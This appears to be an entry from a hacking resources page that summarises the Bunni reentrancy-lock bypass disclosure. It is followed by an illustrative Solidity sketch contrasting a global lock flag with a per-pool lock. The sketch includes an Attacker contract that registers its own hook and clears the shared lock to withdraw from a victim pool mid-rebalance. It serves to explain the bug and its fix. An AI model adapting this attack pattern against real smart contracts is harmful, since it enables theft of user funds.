Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Bug Disclosure: Reentrancy Lock Bypass - 1650

Bunni, posted 10 months ago
  • BunniHub is Bunni's pool contract. It could be re-entered via a user-defined hook while a pool's accounting was in an intermediate state, a classic reentrancy bug that would eventually have led to lost user funds. Pashov Audit Group found this reentrancy during their audit.
  • To mitigate the original issue, they introduced a pair of functions to prevent reentrancy, lockForRebalance and unlockForRebalance, which lock rebalancing before an order is placed and unlock it once the order has executed. The catch: the lock is a single flag on the contract, not one per pool.
  • Any Bunni pool can have a hook contract registered for it, by anyone, and that hook is allowed to call the lock functions. Because the lock is global, an attacker can deploy their own hook, register it on a pool they control, and use it to clear the reentrancy lock while another pool is mid-rebalance. From there the manipulation is the same as before the fix and leads to loss of funds. Cyfrin, a web3 auditing company, found this bypass.
  • To patch the issue immediately, they added a whitelist of who may execute rebalancing actions, which in theory closed the attack. To be cautious, they asked Cyfrin whether any other reentrancy paths remained, and Cyfrin dug further. They found a similar issue when a pool interacts with a malicious ERC-4626 vault: the vault could break the pool's accounting and let an attacker withdraw more assets than they were entitled to. To resolve this new issue, all functionality was paused until a proper fix could be made.
  • The contracts had been audited by Pashov Audit Group and Trail of Bits, and are currently being audited by Cyfrin as part of the Uniswap Foundation Security Fund. Patching vulnerabilities is hard: a suggested patch needs to be reviewed as seriously as the original code, otherwise you end up with more issues like this one.
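To make the per-contract-versus-per-pool point concrete, here is an added illustrative sketch. It is not Bunni's code: the contract names, the `fill()` callback, the storage layout and the call flow are all assumptions chosen to isolate the lock mistake. `GlobalLockHub` keeps a single lock flag that any pool's hook can toggle, `PerPoolLockHub` keys the same lock by pool id, and `Attacker` registers itself as the hook of a pool it creates and then acts as the filler during a victim pool's rebalance. The sketch models only the lock bypass, not the accounting damage that follows, and it shows the structural fix (per-pool locks) rather than the caller whitelist the write-up describes as the emergency patch.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustrative sketch, not Bunni's code. Names, storage and the fill()
// callback are assumptions that isolate the per-contract lock mistake.

interface IFiller {
    function fill(bytes32 poolId) external;   // executes the rebalance order; may re-enter
}

abstract contract HubBase {
    mapping(bytes32 => address) public hookOf;                        // pool id => hook contract
    mapping(bytes32 => mapping(address => uint256)) public shares;    // pool id => lp => shares

    // Anyone can create a pool and point it at any hook they like (no permission check).
    function createPool(bytes32 poolId, address hook) external {
        require(hookOf[poolId] == address(0), "pool exists");
        hookOf[poolId] = hook;
    }

    modifier onlyHook(bytes32 poolId) {
        require(msg.sender == hookOf[poolId], "not this pool's hook");
        _;
    }

    // How the lock is stored is the only difference between the two hubs below.
    function _setLocked(bytes32 poolId, bool on) internal virtual;
    function _isLocked(bytes32 poolId) internal view virtual returns (bool);

    // The lock pair introduced after the first audit; callable by a pool's hook.
    function lockForRebalance(bytes32 poolId) external onlyHook(poolId) { _setLocked(poolId, true); }
    function unlockForRebalance(bytes32 poolId) external onlyHook(poolId) { _setLocked(poolId, false); }

    function deposit(bytes32 poolId) external payable { shares[poolId][msg.sender] += msg.value; }

    // Must never run while the pool's accounting is mid-rebalance.
    function withdraw(bytes32 poolId, uint256 amount) external {
        require(!_isLocked(poolId), "rebalance in progress");
        shares[poolId][msg.sender] -= amount;           // checked math reverts on underflow
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // Hook-driven rebalance: lock, hand control to the filler, unlock.
    function rebalance(bytes32 poolId, IFiller filler) external onlyHook(poolId) {
        _setLocked(poolId, true);
        filler.fill(poolId);                             // untrusted external call
        _setLocked(poolId, false);
    }
}

// Flawed: one flag for the whole contract, so any pool's hook can clear it for every pool.
contract GlobalLockHub is HubBase {
    bool private locked;
    function _setLocked(bytes32, bool on) internal override { locked = on; }
    function _isLocked(bytes32) internal view override returns (bool) { return locked; }
}

// Fixed: the lock is keyed by pool, so a hook can only ever unlock its own pool.
contract PerPoolLockHub is HubBase {
    mapping(bytes32 => bool) private locked;
    function _setLocked(bytes32 poolId, bool on) internal override { locked[poolId] = on; }
    function _isLocked(bytes32 poolId) internal view override returns (bool) { return locked[poolId]; }
}

// Attacker: creates a pool whose hook is itself, then serves as filler for a victim
// pool's rebalance. Mid-call it "unlocks" its own pool; on GlobalLockHub that clears
// the single shared flag and re-opens withdraw() for the victim pool.
contract Attacker is IFiller {
    HubBase public immutable hub;
    bytes32 public constant MY_POOL = keccak256("attacker-pool");

    constructor(HubBase hub_) {
        hub = hub_;
        hub_.createPool(MY_POOL, address(this));     // permissionless hook registration
    }

    function fill(bytes32 victimPool) external override {
        hub.unlockForRebalance(MY_POOL);             // allowed: we are MY_POOL's hook
        hub.withdraw(victimPool, 1 ether);           // GlobalLockHub: succeeds; PerPoolLockHub: reverts
    }

    receive() external payable {}
}
```

Run the same scenario against both hubs: on `GlobalLockHub`, `Attacker.fill()` clears the shared flag through `unlockForRebalance(MY_POOL)` and the following `withdraw()` on the victim pool goes through while that pool is still mid-rebalance; on `PerPoolLockHub` the same call only touches the attacker's own pool, so the victim-pool `withdraw()` reverts with "rebalance in progress". The lesson matches the write-up: a guard that any untrusted party can reset is not a guard, so key locks by the thing being protected and restrict who may reset them.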